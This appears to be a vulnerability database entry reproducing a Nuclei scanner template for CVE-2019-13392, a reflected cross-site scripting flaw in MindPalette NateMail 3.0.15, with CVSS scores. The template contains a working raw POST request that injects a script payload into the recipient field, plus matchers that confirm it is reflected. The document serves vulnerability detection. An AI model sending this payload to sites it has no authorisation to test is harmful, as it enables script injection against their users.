Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-13392
HistorySep 15, 2021 - 7:10 a.m.

MindPalette NateMail 3.0.15 - Cross-Site Scripting

2021-09-1507:10:34
ProjectDiscovery
github.com
15
vulnerability
remote code execution
web security
data theft
session hijacking
website defacement
mindpalette
natemail
cve-2019-13392

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

47.7%

MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim’s browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.

id: CVE-2019-13392

info:
  name: MindPalette NateMail 3.0.15 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version of MindPalette NateMail to fix the XSS vulnerability.
  reference:
    - https://www.doyler.net/security-not-included/natemail-vulnerabilities
    - https://mindpalette.com/tag/natemail/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13392
    - https://twitter.com/mindpalette
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-13392
    cwe-id: CWE-79
    epss-score: 0.00127
    epss-percentile: 0.47442
    cpe: cpe:2.3:a:mindpalette:natemail:3.0.15:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mindpalette
    product: natemail
  tags: cve,cve2019,natemail,xss,mindpalette

http:
  - raw:
      - |
        POST /NateMail.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html
# digest: 4a0a0047304502202a90e62949af80a7fe37e16afec3f89f92497c78838e9b766674b4b4f591c9c402210089a0c12120b8786cb3e8c8065707e83ffc7559e5b3de7f798d2c9d4a9f5529c9:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

47.7%

Related for NUCLEI:CVE-2019-13392